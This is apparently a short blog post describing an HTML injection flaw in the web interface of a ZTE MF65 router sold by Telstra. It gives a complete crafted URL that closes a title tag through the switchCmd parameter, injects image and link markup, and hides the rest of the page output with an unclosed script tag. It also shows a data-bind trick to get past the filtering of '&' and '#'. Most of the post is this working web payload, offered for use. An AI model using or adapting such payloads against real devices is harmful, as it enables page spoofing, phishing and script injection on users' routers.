ZTE(telstra)MF65
Remote file include :
this exploit uses :http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=
and exploits the loose handling of closing html tags because the switchCmd page uses a unclosed <title> tag to normally write the switch command and return either success or fail in the page title, this leads us to closing the <tiltle> and starting a new tag, i found <xyz> worked as an arbitrary tag
, this worked great(you could use anything in there), so we have :
switchCmd=pagenamegoeshere</title><xyz>
and using the img tag and span tags we get
<img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this will take us out of the local net</span></a></span>
then we close out the <xyz>
and finally we use a unclosed <script> to hide the rest of the normal output
in total we get:
http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=pagenamegoeshere</title><xyz><img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this will take us out of the local net</span></a></span></xyz><script>
we cant use & or # symbols in the scripts so it makes it kinda hard to utilise all of scripting used by the webserver although
this can be used to append # to objects via scripting:
<a trans=" ? " href=" ? " data-bind="attr: {href: hash, trans: hash.substring(1)}">
gives href:# ?
and trans:# ?
till next time
No comments:
Post a Comment